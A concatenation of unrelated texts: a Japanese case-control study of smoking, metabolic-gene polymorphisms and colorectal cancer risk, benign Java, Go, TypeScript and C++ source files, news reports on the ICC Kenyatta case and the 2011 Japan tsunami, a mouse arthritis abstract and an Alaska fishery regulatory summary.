Both environmental and genetic factors are thought to play an important role in colorectal carcinogenesis. The contribution of genetic factors to the etiology of colorectal cancer was estimated at 35% in a twin study. Recent genome-wide association studies have identified several novel single nucleotide polymorphisms (SNPs) associated with colorectal cancer risk, suggesting the importance of combinations of low-penetrance genes. Furthermore, it is estimated that one such SNP is involved in approximately 15% of colorectal cancers in European populations. A large number of studies have consistently shown that cigarette smoking is associated with increased risk of colorectal adenoma, a well-established precursor lesion of colorectal cancer, as reviewed elsewhere. The findings on smoking and colorectal cancer are inconsistent, however. While a recent meta-analysis reported a statistically significant 1.18-fold increase in the risk of colorectal cancer associated with smoking, individual studies showed a weak or null association between smoking and colorectal cancer. For example, several studies suggested a modest increase in the risk of colorectal cancer associated with smoking, but other studies failed to find such a positive association.
Tobacco smoke contains various types of carcinogens, such as polycyclic aromatic hydrocarbons (PAHs), heterocyclic amines, aromatic amines and N-nitrosamines, which require metabolic activation and detoxification by different enzymatic pathways, including cytochrome P-450 (CYP), glutathione-S-transferases (GSTs) and NAD(P)H:quinone oxidoreductase 1 (NQO1). CYP1A1 is a phase I, predominantly extrahepatic, microsomal enzyme involved in the bioactivation of PAHs including benzo(a)pyrene. Two functional polymorphisms are known in the CYP1A1 gene; one is a 3698T>C substitution (CYP1A1*2A, rs4646903) creating an MspI restriction site in the 3'-flanking region, and the other is a 2454A>G substitution (CYP1A1*2C, rs1048943) resulting in an amino acid change in exon 7 (Ile462Val). The CYP1A1*2A and CYP1A1*2C alleles are putatively linked to higher inducibility of the enzyme, and some studies have suggested an increased risk of tobacco-related cancers associated with these variant alleles. An increased risk of in situ colorectal carcinoma associated with CYP1A1*2A was reported in a small case-control study in Hawaii, but no association between CYP1A1*2A and colorectal cancer was observed in subsequent studies. CYP1A1*2C was unrelated to colorectal cancer risk in these studies, but was associated with an increased risk in another study. GSTs are a superfamily of detoxification enzymes that facilitate the inactivation of chemical carcinogens and environmental toxic compounds. GSTs consist of several classes of genes, and the GSTM1 and GSTT1 polymorphisms have been investigated most intensively in relation to tobacco-related cancers. The null genotypes of these polymorphisms result in a complete loss of enzyme function, and carriers may thus be at increased risk of tobacco-related cancers. Results on GSTM1 and GSTT1 polymorphisms in relation to colorectal cancer are inconsistent, as reviewed elsewhere. The GSTP1 gene also has a functional polymorphism, but this polymorphism is unlikely to play an important role in smoking-related cancers. NQO1 is involved in detoxification through the two-electron reduction of quinones to hydroquinones, thereby inhibiting DNA adduct formation, although NQO1 can act as a pro-oxidant under certain conditions. The functional 609C>T polymorphism (rs1800566) causing an amino acid change (Pro187Ser) results in loss of NQO1 activity, and may increase susceptibility to cancer, especially tobacco-related cancers. A meta-analysis suggested an increased susceptibility to colorectal cancer, as well as to lung and bladder cancers, associated with the NQO1 187Ser allele, although the results from individual studies were heterogeneous. Previously, several studies have addressed the interaction between cigarette smoking and one or more of these polymorphisms on colorectal cancer risk [19,20,...], and some suggested an interaction between GSTT1 or GSTM1 null genotype and cigarette smoking and between CYP1A1*2A or CYP1A1*2C and cigarette smoking. Few studies have addressed the gene-gene interaction between phase I and phase II enzymes in relation to colorectal carcinogenesis. In the present study, we examined the relation of CYP1A1, GSTM1, GSTT1 and NQO1 polymorphisms, as well as of cigarette smoking, to colorectal cancer risk in the Fukuoka Colorectal Cancer Study, a community-based case-control study, focusing on the interaction with cigarette smoking and on gene-gene interaction. This is the first study of combined genotypes of phase I and II enzymes and colorectal cancer risk in Japan.
Methods

The Fukuoka Colorectal Cancer Study is a case-control study of incident cases and community controls in Fukuoka City and three adjacent areas. Details of methodological issues have been described elsewhere. The study protocol was approved by the ethics committees of the Kyushu University Faculty of Medical Sciences and of all but two of the participating hospitals. The two hospitals had no ethics committees at the time of the survey, and approval was obtained from the director of each hospital.

Subjects

Cases were a consecutive series of patients with histologically confirmed incident colorectal adenocarcinoma who were admitted to one of the participating hospitals (two university hospitals and six affiliated hospitals) for surgical treatment during the period September 2000 to December 2003. Eligible cases were Japanese men and women aged 20 to 74 years at the time of diagnosis who lived in the study area; had no prior history of partial or total removal of the colorectum, familial adenomatous polyposis, or inflammatory bowel disease; and were mentally competent to give informed consent and to complete the interview. Of the total 1,053 eligible cases, 840 (80%) participated in the interview, and 685 gave informed consent for the genotyping. Controls were randomly selected from the study area by frequency-matching with respect to gender and 10-year age group. Eligibility criteria for controls were the same as described for the cases, except that they had no prior diagnosis of colorectal cancer. A total of 1,500 persons were selected as control candidates by a two-stage random sampling using the residential registry. They were invited to participate in the study by mail. Of these, 833 persons participated in the survey, and 778 gave informed consent for the genotyping. The participation rate for the interview was calculated as 60% (833 of 1,382), after exclusion of 118 persons for the following reasons: death (n = 7), migration from the study area (n = 22), undelivered mail (n = 44), mental incompetence (n = 19), history of partial or total removal of the colorectum (n = 21) and diagnosis of colorectal cancer after the survey (n = 5).

Interview

Research nurses interviewed cases and controls in person regarding smoking, alcohol intake, physical activity and other factors, using a uniform questionnaire. Interviews of cases were conducted in hospital during admission, and those of controls were conducted mostly at public community centers or collaborating clinics. The referent time for cases was the date of the onset of symptoms or of screening, and that for controls was the time of interview. Detailed information on smoking history was ascertained by first asking individuals whether they had ever smoked cigarettes daily for one year or longer. Age at starting smoking and age at quitting smoking (for past smokers) were ascertained, along with years of smoking and number of cigarettes smoked per day for each decade of age from the second to the eighth decade. Cumulative exposure to cigarette smoking until the beginning of the previous decade of age was expressed in cigarette-years, the number of cigarettes smoked per day multiplied by years of smoking, and classified into 0, 1-399, 400-799 and ≥800 cigarette-years. Alcohol consumption at the time of five years prior to the referent time was elicited.
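To make the exposure metric concrete, here is a minimal sketch (Python; the per-decade smoking history values are hypothetical, not taken from the study) of the cigarette-years computation just described: cigarettes per day multiplied by years of smoking, accumulated across decades of age and then classified into the study's categories.

# Hypothetical smoking history: (cigarettes per day, years smoked) for
# each decade of age, mirroring the questionnaire's per-decade format.
history = [(10, 5),   # e.g. ages 20-29: 10 cigarettes/day for 5 years
           (20, 10),  # ages 30-39
           (15, 10)]  # ages 40-49

# Cigarette-years = cigarettes/day x years of smoking, summed over decades.
cigarette_years = sum(per_day * years for per_day, years in history)

def classify(cy):
    """Exposure categories used in the study: 0, 1-399, 400-799, >=800."""
    if cy == 0:
        return "0 (lifelong nonsmoker)"
    elif cy < 400:
        return "1-399"
    elif cy < 800:
        return "400-799"
    return ">=800"

print(cigarette_years, classify(cigarette_years))  # 400 -> "400-799"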
The amount of alcohol was expressed in conventional units; one go (180 mL) of sake, one large bottle (633 mL) of beer and half a go (90 mL) of shochu were each counted as one unit, and one drink (30 mL) of whisky or brandy and one glass (100 mL) of wine were each counted as a half unit. Questions on physical activity elicited type of job (sedentary or standing work, work with walking, labor work, hard labor work and no job), activities in commuting and housework, and leisure-time activities at the time five years previously. As described in detail previously, leisure-time physical activity (including activities in commuting and housework) was expressed as the sum of metabolic equivalents (METs) multiplied by hours of weekly participation in each activity. Height (cm), recent body weight and body weight 10 years before were elicited. Body mass index (kg/m²) 10 years earlier was used because the current body mass index was unrelated to risk. Body weight 10 years earlier was not ascertained for 2 cases and 10 controls and was substituted with the current body weight. Gene-gene and gene-environment (smoking) interactions were statistically evaluated based on the likelihood ratio test, comparing the model including a term or terms for interaction with the model without. Deviation from the Hardy-Weinberg equilibrium was evaluated by chi-square test with 1 degree of freedom. Statistical significance was declared if a two-sided P-value was less than 0.05. Statistical analyses were carried out using SAS version 9.2 (SAS Institute, Cary, NC).

Results

Table 1 shows the association between cigarette smoking and colorectal cancer risk. Adjustment for the covariates did not markedly change the results. As compared with lifelong nonsmokers, men and women with a light exposure to cigarette smoking (1-399 cigarette-years) showed a moderate decrease in the OR of colorectal cancer. The decreases in the OR in both sexes combined and in women were statistically significant. The ORs for higher categories of smoking were slightly greater than unity in both men and women, but the increases were not statistically significant. In men and women combined, the multivariate-adjusted ORs for past and current smokers as compared with lifelong nonsmokers were 0.90 (95% CI 0.66-1.24) and 0.80 (95% CI 0.58-1.05), respectively. There was no clear association between cumulative years of smoking and colorectal cancer.

None of the five polymorphisms showed a measurable association with the risk of colorectal cancer, nor did the composite genotype of GSTM1 and GSTT1 (Table 2). No polymorphism was associated with smoking history (cigarette-years) in either men or women among controls (data not shown). Frequencies of the CYP1A1*2A allele were 0.363 in cases and 0.372 in controls, and frequencies of the CYP1A1*2C allele were 0.221 in cases and 0.230 in controls. Frequencies of the 187Ser allele of the NQO1 polymorphism were 0.376 in cases and 0.385 in controls. Genotype distributions of these three polymorphisms were in accordance with the Hardy-Weinberg equilibrium within cases and within controls (all P > 0.05). The CYP1A1*2A and CYP1A1*2C polymorphisms were in complete linkage disequilibrium.

There was no material interaction between cigarette smoking and any polymorphism on colorectal cancer risk (Table 3). Repeated analyses for men and for colon and rectal cancers did not show any measurable interaction between smoking and genotype.
We further examined gene-gene interactions for the combination of CYP1A1 and GST polymorphisms (Table 4) and of CYP1A1 and NQO1 polymorphisms (Table 5). The combination of CYP1A1*2A or CYP1A1*2C and GSTT1 polymorphisms showed a nearly statistically significant or statistically significant interaction. The composite genotype of GSTT1 non-null and the CYP1A1*2A or CYP1A1*2C allele was associated with a decreased risk of colorectal cancer (Table 4). There was no measurable interaction between CYP1A1 and NQO1 polymorphisms in relation to colorectal cancer risk (Table 5). Decreased risks for the combination of a CYP1A1 variant allele and GSTT1 non-null genotype were observed only in men; the multivariate-adjusted ORs were 0.62 (95% CI 0.42-0.90) for the combination of the CYP1A1*2A allele and GSTT1 non-null genotype (P interaction = 0.04) and 0.63 (95% CI 0.43-0.91) for that of the CYP1A1*2C allele and GSTT1 non-null genotype (P interaction = 0.07). Cigarette smoking showed no effect modification on associations with composite genotypes of CYP1A1 and GST or NQO1 polymorphisms. For example, the decreased risk among individuals harboring the CYP1A1*2A or CYP1A1*2C allele and GSTT1 non-null genotype was observed regardless of exposure to smoking. In other words, high exposure to smoking was consistently related to an increased risk of colorectal cancer across different composite genotypes (see additional file 1).

Discussion

Many studies have addressed the association between cigarette smoking and colorectal cancer risk, and their findings are highly variable, although an 18% increase in colorectal cancer risk was estimated for ever-smokers versus never-smokers in a recent meta-analysis. The variable results may be due to differences in study method, statistical power and ethnicity. The association may also differ by sex or location of colorectal cancer. In fact, prospective studies showed higher risk estimates than case-control studies in the meta-analysis. Furthermore, while an increased risk associated with smoking was observed in both men and women, the positive association with smoking was more evident for rectal cancer than for colon cancer. The present finding adds to the evidence that cigarette smoking is associated with increased risk of rectal cancer. It was unexpected that individuals with an exposure of 1-399 cigarette-years had a decreased risk of colorectal cancer. This decrease was observed for colon cancer but not for rectal cancer, and was more marked in women. Previously, some case-control studies also suggested that smoking was associated with a decreased risk of distal colon cancer in Caucasians and of colon cancer in Japanese. We have no clear explanation for the decreased risk of colon cancer associated with light smoking, although confounding remains a possible explanation. In agreement with the results from three studies, the present study did not show an association of either the CYP1A1*2A or the CYP1A1*2C polymorphism with colorectal cancer risk. An 8-fold increased risk of colorectal cancer among Japanese homozygotes of the CYP1A1*2A allele in Hawaii is probably a chance finding due to small numbers (23 cases and 59 controls). Of these previous studies, two examined the interaction between CYP1A1 polymorphisms and smoking. One study reported an increased risk of rectal cancer, but not of colon cancer, among former and current smokers who did not carry either the CYP1A1*2A or CYP1A1*2C allele, while the other study showed no interaction between either of the CYP1A1 polymorphisms and smoking on colorectal cancer risk.
The GSTM1 and GSTT1 polymorphisms were unrelated to colorectal cancer risk, singly or in combination, in the present study. The GSTM1 null genotype was associated with a small, statistically significant increase in the risk of colorectal cancer in some case-control studies, but not in several other studies [20,...]. Likewise, the previous findings on the GSTT1 null genotype and colorectal cancer are inconsistent. A meta-analysis based on 11 studies reported a small increase in colorectal cancer risk associated with the GSTT1 null genotype, but the results of these studies were highly heterogeneous. Most of the previous studies found no increase in the risk of colorectal cancer in individuals with the combined null genotype of GSTM1 and GSTT1. On the other hand, a 5-fold increased risk of colorectal cancer was reported for simultaneous carriers of both GSTM1 and GSTT1 null genotypes in a study of 144 cases and 329 healthy controls in Spain. In that study, the GSTM1 and GSTT1 null genotypes were also statistically significantly associated with 1.9-fold and 3.6-fold increased risks, respectively. Frequencies of GSTM1 and GSTT1 null genotypes vary across populations, but the difference in genotype distribution does not seem to explain the different results. The combined null genotype of GSTM1 and GSTT1 accounted for 24% among controls in the present study and for 7% in the Spanish study. The statistical power was obviously greater in the present study than in the Spanish study. At least six case-control studies have examined the relation between the NQO1 Pro187Ser polymorphism and colorectal cancer, and only one study, which included 371 cases and 415 healthy controls in the Netherlands, showed a statistically significant increase in the risk associated with the variant 187Ser allele. On the other hand, homozygosity for the NQO1 187Ser allele was associated with a 2-fold increase in the prevalence odds of colorectal adenomas in the United States. In that study, individuals having both CYP1A1*2C and NQO1 187Ser variant alleles showed a significantly increased risk, particularly among heavy smokers. The present findings showed neither an increased risk of colorectal cancer in relation to the composite of CYP1A1 variant and NQO1 187Ser alleles nor an interaction between the composite genotypes and smoking. A unique finding in the present study is that the CYP1A1*2A or CYP1A1*2C allele was associated with a decreased risk only in individuals with the GSTT1 non-null genotype. Interpretation of these findings is rather difficult, particularly because the association was confined to men. Available evidence suggests at least a secondary role of the CYP1A1 polymorphisms in increased risks of smoking-related cancers, although the association between these polymorphisms and enzyme activity or properties remains controversial. Two smaller case-control studies previously examined the combined effect of CYP1A1*2C and either GSTM1 or GSTT1 null genotype, showing no interaction between the two. The present findings on the CYP1A1 and GSTT1 polymorphisms in combination may be due to chance, and need to be consolidated in further studies. The use of community controls, the large number of subjects, and the ethnic homogeneity of the study population were strengths of the present study. The statistical power was fairly large except for the CYP1A1*2C polymorphism.
The powers of detecting an OR of 1.5 for variant homozygotes compared with wild-type homozygotes (two-sided α = 0.05) were 0.71 for CYP1A1*2A, 0.42 for CYP1A1*2C and 0.69 for NQO1, and the corresponding values for the null versus non-null genotype were 0.96 for GSTM1 and 0.93 for GSTT1. Several limitations need to be discussed. Participation in the interview was not as high among the controls (60%) as among the cases (80%). We had no information on differences between participating and nonparticipating controls with respect to smoking history. The overall participation for genotyping was rather low (65% in cases and 56% in controls). Although older persons and women were less likely to give consent for the genotyping, there was no difference between those who gave consent and those who did not in terms of smoking, residence area, and alcohol use. A retrospective assessment of cumulative exposure to cigarette smoking is subject to inaccuracy, and may have been biased because interviewers knew the case-control status. Lifestyle factors were assessed for different time periods in the past for ease of recall. This may have caused inaccuracy to different extents for the covariates, leaving different magnitudes of residual confounding. It is known that the GSTM1 and GSTT1 genes contain nonsynonymous SNPs which may modify enzyme activity, but these SNPs seem to be of little relevance in Asians as well as in Caucasians. Finally, although cases with familial adenomatous polyposis were not included, other hereditary colorectal cancers were not specifically ascertained in the present study. However, in the analysis excluding 16 cases and 40 controls aged <40 years, the results were essentially the same as those described above.

Conclusions

The present study showed a moderately decreased risk of colorectal cancer, especially of colon cancer, in individuals with a light exposure to cigarette smoking. A high exposure to cigarette smoking was associated with an increased risk of rectal cancer. None of the genetic polymorphisms relevant to the metabolism of tobacco carcinogens showed a measurable association with the risk of colorectal cancer. The observed interactions between CYP1A1 and GSTT1 polymorphisms warrant further investigation.
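Returning to the power figures quoted at the start of this section: as an illustration of how such values can be approximated, the sketch below treats the genotype comparison as a two-proportion problem. This is not the authors' calculation; the genotype frequency and sample sizes are placeholders, and the approximation ignores covariate adjustment.

from statsmodels.stats.power import NormalIndPower
from statsmodels.stats.proportion import proportion_effectsize

def power_for_or(p0, odds_ratio, n_cases, n_controls, alpha=0.05):
    """Two-sided power to detect a genotype odds ratio, approximated
    as a comparison of exposure proportions in cases vs. controls."""
    odds1 = odds_ratio * p0 / (1 - p0)
    p1 = odds1 / (1 + odds1)  # genotype prevalence among cases
    effect = proportion_effectsize(p1, p0)
    return NormalIndPower().power(effect, nobs1=n_cases, alpha=alpha,
                                  ratio=n_controls / n_cases)

# Placeholder inputs (assumptions, not the study's actual figures):
print(round(power_for_or(p0=0.10, odds_ratio=1.5, n_cases=800, n_controls=800), 2))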
/*
 * File    : ExtractCoincidences.java
 * Created : 02-Mar-2009
 * By      : atrilla
 *
 * Emolib - Emotional Library
 *
 * Copyright (c) 2009 <NAME> &
 * 2007-2012 Enginyeria i Arquitectura La Salle (Universitat Ramon Llull)
 *
 * This file is part of Emolib.
 *
 * You should have received a copy of the rights granted with this
 * distribution of EmoLib. See COPYING.
 */

package emolib.util.eval.semeval;

import java.io.*;

/**
 * The <i>ExtractCoincidences</i> class checks the coincidences between the
 * two input emotion tag categorisations and creates one file with these
 * matches, another file with the predictions produced by EmoLib and a file
 * containing the original sentences for further study (relation with its
 * dimensions).
 *
 * <p>
 * In case a quick reference of its usage is needed, the class responds to the
 * typical help queries ("-h" or "--help") by showing the program's synopsis.
 * </p>
 *
 * @author <NAME> (<EMAIL>)
 */
public class ExtractCoincidences {

    /**
     * Void constructor.
     */
    public ExtractCoincidences() {
    }

    /**
     * Prints the synopsis.
     */
    public void printSynopsis() {
        System.out.println("ExtractCoincidences usage:");
        System.out.println("\tjava -cp EmoLib-X.Y.Z.jar emolib.util.eval.semeval.ExtractCoincidences " +
                "FILE_CATEGORIES_1 FILE_CATEGORIES_2 PREDICTIONS_FILE SENTENCES_FILE OUTPUT_FOLDER");
    }

    /**
     * The main method of the ExtractCoincidences application.
     *
     * @param args The input arguments. The first one corresponds to the first input categories file,
     * followed by the second input categories file, followed by the predictions file produced by
     * EmoLib, followed by the sentences file and finally, as the fifth parameter, the desired
     * output folder.
     */
    public static void main(String[] args) throws Exception {
        ExtractCoincidences theExtractor = new ExtractCoincidences();
        if (args.length == 5) {
            BufferedReader categoriesFileOne = new BufferedReader(new FileReader(args[0]));
            BufferedReader categoriesFileTwo = new BufferedReader(new FileReader(args[1]));
            BufferedReader predictionFile = new BufferedReader(new FileReader(args[2]));
            BufferedReader sentencesFile = new BufferedReader(new FileReader(args[3]));
            BufferedWriter outputCategoriesFile = new BufferedWriter(new FileWriter(args[4] +
                    System.getProperty("file.separator") + "semeval_categories.txt"));
            BufferedWriter outputPredictionsFile = new BufferedWriter(new FileWriter(args[4] +
                    System.getProperty("file.separator") + "emolib_predictions.txt"));
            BufferedWriter outputSentencesFile = new BufferedWriter(new FileWriter(args[4] +
                    System.getProperty("file.separator") + "semeval_sentences.txt"));
            String lineCategoriesFileOne = categoriesFileOne.readLine();
            String lineCategoriesFileTwo = categoriesFileTwo.readLine();
            String linePredictionFile = predictionFile.readLine();
            String lineSentencesFile = sentencesFile.readLine();
            // Walk the four files in lockstep and keep only the lines where both
            // categorisations agree.
            while ((lineCategoriesFileOne != null) && (lineCategoriesFileTwo != null) &&
                    (linePredictionFile != null) && (lineSentencesFile != null)) {
                if (lineCategoriesFileOne.trim().equals(lineCategoriesFileTwo.trim())) {
                    outputCategoriesFile.write(lineCategoriesFileOne.trim());
                    outputCategoriesFile.newLine();
                    outputPredictionsFile.write(linePredictionFile.trim());
                    outputPredictionsFile.newLine();
                    outputSentencesFile.write(lineSentencesFile.trim());
                    outputSentencesFile.newLine();
                }
                lineCategoriesFileOne = categoriesFileOne.readLine();
                lineCategoriesFileTwo = categoriesFileTwo.readLine();
                linePredictionFile = predictionFile.readLine();
                lineSentencesFile = sentencesFile.readLine();
            }
            // Close the readers as well as the writers to avoid leaking file handles.
            categoriesFileOne.close();
            categoriesFileTwo.close();
            predictionFile.close();
            sentencesFile.close();
            outputCategoriesFile.close();
            outputPredictionsFile.close();
            outputSentencesFile.close();
        } else if (args.length == 1) {
            if (args[0].equals("-h") || args[0].equals("--help")) {
                theExtractor.printSynopsis();
            } else {
                System.out.println("ExtractCoincidences: Please enter the correct parameters!");
                System.out.println("");
                theExtractor.printSynopsis();
            }
        } else {
            System.out.println("ExtractCoincidences: Please enter the correct parameters!");
            System.out.println("");
            theExtractor.printSynopsis();
        }
    }
}
Kenyan President Uhuru Kenyatta says he's ''very excited'' that ''crimes against humanity'' charges against him have been dropped by the ICC, and hopes similar cases against his deputy will also be dismissed. Jennifer Davis reports. (SOUNDBITE) (English) KENYAN FOREIGN AFFAIRS CABINET SECRETARY, AMINA MOHAMED, SAYING: "Today at The Hague, the prosecutor has dismissed the charges against his Excellency the president..." From healthy applause to celebrations in the streets, Kenyans reacted to the news that the International Criminal Court in The Hague has withdrawn charges of crimes against humanity against Kenyan President Uhuru Kenyatta. (SOUNDBITE)(English) KENYAN PRESIDENT UHURU KENYATTA, SAYING: "I am very keen to run home to my wife right now and tell her what's happening - anyway I am very excited by the way." Prosecutors say Kenyatta, who had been accused of orchestrating a wave of deadly violence after Kenya's 2007 elections, used his political power to obstruct their investigation, especially since becoming president last year. Kenyatta's lawyers rejected the accusations. The court did not acquit Kenyatta of the charges as his lawyers had requested, so charges could be brought again if more evidence becomes available. Kenyatta says he now wants the case against his deputy dropped too.
Granulocyte-macrophage colony stimulating factor exacerbates collagen induced arthritis in mice

OBJECTIVE To examine the effect of granulocyte-macrophage colony stimulating factor (GM-CSF) on disease progression in the collagen induced arthritis (CIA) model in mice.
METHODS DBA/1 mice were primed for a suboptimal CIA response by intradermal injection of chick type II collagen without a secondary immunisation. Three weeks after immunisation the mice were given four to five consecutive daily intraperitoneal injections of recombinant murine GM-CSF (15 μg; 5 × 10⁵ U), or vehicle, and arthritis development was monitored by clinical scoring of paws and calliper measurements of footpad swelling. At approximately six to eight weeks after immunisation mice were killed, their limbs removed and processed for histological analyses of joint pathology.
RESULTS Control animals receiving a single immunisation with collagen exhibited a varied CIA response both in terms of incidence and severity. Mice treated with GM-CSF at 20 to 25 days after immunisation with collagen had a consistently greater incidence and more rapid onset of disease than the vehicle treated control mice, based on clinical assessment. GM-CSF treated mice showed higher average clinical scores and greater paw swelling than controls. Histological analyses of joints reflected the clinical scores, with GM-CSF treated mice displaying more pronounced pathology (synovitis, pannus formation, cartilage and bone damage) than control mice.
CONCLUSION GM-CSF is a potent accelerator of the pathological events leading to chronic inflammatory polyarthritis in murine CIA, supporting the notion that GM-CSF may play a part in inflammatory polyarthritis, such as rheumatoid arthritis.
package com.yisu.springboot;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

/**
 * Groovy test
 * @author xuyisu
 * @date 2021/11/12
 */
@SpringBootApplication
public class FwGroovyApplication {

    public static void main(String[] args) {
        SpringApplication.run(FwGroovyApplication.class, args);
    }
}
/**
 * @typedef {import('./types').HTTPClientExtraOptions} HTTPClientExtraOptions
 * @typedef {import('ipfs-core-types/src/root').API<HTTPClientExtraOptions>} RootAPI
 */
export const createResolve: import("./lib/configure.js").Factory<(path: string, options?: (import("ipfs-core-types/src/root").ResolveOptions & import("./types").HTTPClientExtraOptions) | undefined) => Promise<string>>;
export type HTTPClientExtraOptions = import('./types').HTTPClientExtraOptions;
export type RootAPI = import('ipfs-core-types/src/root').API<HTTPClientExtraOptions>;
//# sourceMappingURL=resolve.d.ts.map
#ifndef SERIALIZATION_H
#define SERIALIZATION_H

/**
 * Headers for all boost::serialization functionalities used in project.
 */

#include <boost/archive/text_oarchive.hpp>
#include <boost/archive/text_iarchive.hpp>
#include <boost/serialization/export.hpp>
#include <boost/serialization/base_object.hpp>
#include <boost/serialization/binary_object.hpp>
#include <boost/serialization/vector.hpp>
#include <boost/serialization/shared_ptr.hpp>
#include <boost/serialization/weak_ptr.hpp>

#endif // SERIALIZATION_H
Some 10,000 people are unaccounted for in the town of Minami Sanriku, which has been buried under mud [Al Jazeera]

Rescuers are recovering bodies and searching for survivors along Japan's northeastern coastline, as millions of survivors are left without drinking water, electricity and proper food in the wake of a devastating earthquake and tsunami. The death toll from Friday's twin disasters will probably exceed 10,000 in Miyagi prefecture alone, Naoto Takeuchi, the local police chief, said on Sunday as hundreds of bodies were recovered. Naoto Kan, Japan's prime minister, said the crisis was the worst disaster the country had faced since the second world war. But in one astonishing rescue, a military helicopter on Sunday picked up a 60-year-old man floating off the coast of Fukushima on the roof of his house after being swept 15km out to sea by the tsunami, the defence ministry said. "I ran away after learning that the tsunami was coming," Hiromitsu Shinkawa told rescuers according to Jiji Press. "But I turned back to pick up something at home, when I was washed away. I was rescued while I was hanging to the roof of my house." Dislodged shipping containers piled up along the coastline and swathes of mangled wreckage consumed what used to be rice fields. An elderly woman wrapped in a blanket tearfully recalled how she and her husband evacuated from Kesennuma town, north of Miyagi prefecture, where the massive tsunami swept through a fishing port. "I was trying to escape with my husband, but water forced us to run up to the second story of a house of people we don't even know at all," she told NHK television. "Water still came up to the second floor, and before our eyes, the house's owner and his daughter were flushed away. We couldn't do anything. Nothing."

Water shortages

The quake, measured at magnitude 9.0 by the Japanese Meteorological Agency, was the strongest ever recorded in the country. It has been followed by more than 150 powerful aftershocks. At least 1.4 million households have gone without water since the quake struck and millions of households are without electricity. Temperatures were to dip near freezing overnight. Large areas of the countryside remained surrounded by water and unreachable. Many fuel stations were closed and people were running out of petrol for their vehicles. Public broadcaster NHK said around 310,000 people have been evacuated to emergency shelters, many of them without power. In Iwaki town, residents were leaving due to concerns over dwindling food and fuel supplies. The town had no electricity and all stores were closed. As Sendai city endured a pitch-black night amid a power blackout, Masayoshi Yamamoto, the Sendai Teishin Hospital spokesman, told the AFP news agency the building was able to keep its lights on using its own power generators, drawing in survivors. Around 50 people arrived looking to shelter from the cold night air in the lobby of the downtown Sendai city hospital, he said. "Many of them are from outside Miyagi prefecture, who had visited some patients here or came in search of essential medicines," he said. But with water supplies cut, Yamamoto said hospital officials were worried about how long its tank-based supply would last. The hospital may also run out of food for its patients by Monday. "We have asked other hospitals to provide food for us, but transportation itself seems difficult," he said. In Sendai, 24-year-old Ayumi Osuga dug through the destroyed remnants of her home.
She had been practising origami, the Japanese art of folding paper into figures, with her three children when the quake struck. She recalled her husband's shouted warning from outside: "Get out of there now!" She gathered her children and fled in her car to higher ground with her husband. They spent the night huddled in a hilltop home belonging to her husband's family about 20km away. "My family, my children. We are lucky to be alive," she told the Associated Press. "I have come to realise what is important in life."
/*
Copyright SecureKey Technologies Inc. All Rights Reserved.

SPDX-License-Identifier: Apache-2.0
*/

package context

import (
	"encoding/json"
	"fmt"

	"github.com/hyperledger/aries-framework-go/pkg/didcomm/dispatcher"
	"github.com/hyperledger/aries-framework-go/pkg/didcomm/transport"
	"github.com/hyperledger/aries-framework-go/pkg/framework/aries/api"
	"github.com/hyperledger/aries-framework-go/pkg/wallet"
)

// Provider supplies the framework configuration to client objects.
type Provider struct {
	outboundTransport transport.OutboundTransport
	services          []dispatcher.Service
	wallet            wallet.Wallet
}

// New instantiates a new context provider.
func New(opts ...ProviderOption) (*Provider, error) {
	ctxProvider := Provider{}

	for _, opt := range opts {
		err := opt(&ctxProvider)
		if err != nil {
			return nil, fmt.Errorf("option failed: %w", err)
		}
	}

	return &ctxProvider, nil
}

// OutboundTransport returns the outbound transport provider.
func (p *Provider) OutboundTransport() transport.OutboundTransport {
	return p.outboundTransport
}

// Service returns the protocol service registered under the given id.
func (p *Provider) Service(id string) (interface{}, error) {
	for _, v := range p.services {
		if v.Name() == id {
			return v, nil
		}
	}

	return nil, api.ErrSvcNotFound
}

// CryptoWallet returns the crypto wallet service.
func (p *Provider) CryptoWallet() wallet.Crypto {
	return p.wallet
}

// InboundMessageHandler returns the inbound message handler.
func (p *Provider) InboundMessageHandler() transport.InboundMessageHandler {
	return func(payload []byte) error {
		// get the message type from the payload and dispatch based on the services
		msgType := &struct {
			Type string `json:"@type,omitempty"`
		}{}

		err := json.Unmarshal(payload, msgType)
		if err != nil {
			return fmt.Errorf("invalid payload data format: %w", err)
		}

		// find the service which accepts the message type
		for _, svc := range p.services {
			if svc.Accept(msgType.Type) {
				return svc.Handle(dispatcher.DIDCommMsg{Type: msgType.Type, Payload: payload})
			}
		}

		return fmt.Errorf("no message handlers found for the message type: %s", msgType.Type)
	}
}

// ProviderOption configures the framework.
type ProviderOption func(opts *Provider) error

// WithOutboundTransport injects a transport provider into the framework.
func WithOutboundTransport(ot transport.OutboundTransport) ProviderOption {
	return func(opts *Provider) error {
		opts.outboundTransport = ot
		return nil
	}
}

// WithProtocolServices injects protocol services into the context.
func WithProtocolServices(services ...dispatcher.Service) ProviderOption {
	return func(opts *Provider) error {
		opts.services = services
		return nil
	}
}

// WithWallet injects a wallet service into the context.
func WithWallet(w wallet.Wallet) ProviderOption {
	return func(opts *Provider) error {
		opts.wallet = w
		return nil
	}
}
FINAL REGULATORY IMPACT REVIEW / INITIAL REGULATORY FLEXIBILITY ANALYSIS
For Amendment 45 to the Fishery Management Plan for

This action would remove Gulf of Alaska (GOA) Pacific cod sideboard limits applicable to some freezer longliners if certain conditions are met during a limited period of time. The sideboard limits were originally created by the Crab Rationalization Program and were shared by participants using all gear types in the inshore or offshore groundfish sectors. In 2012, these sideboard limits were disaggregated to create limits based on gear type and operation type, as part of the GOA Pacific cod sector splits (Amendment 83 to the FMP for Gulf of Alaska Groundfish). Given the limited catch history of the sideboarded freezer longline vessels (i.e., using hook-and-line) during the 1996 through 2000 period, the modified sideboard limits eliminated participation in the GOA Pacific cod fisheries by these vessels. This action is intended to promote cooperation among all freezer longline vessels prior to the removal of sideboards.
Waveform and Transceiver Design for Simultaneous Wireless Information and Power Transfer

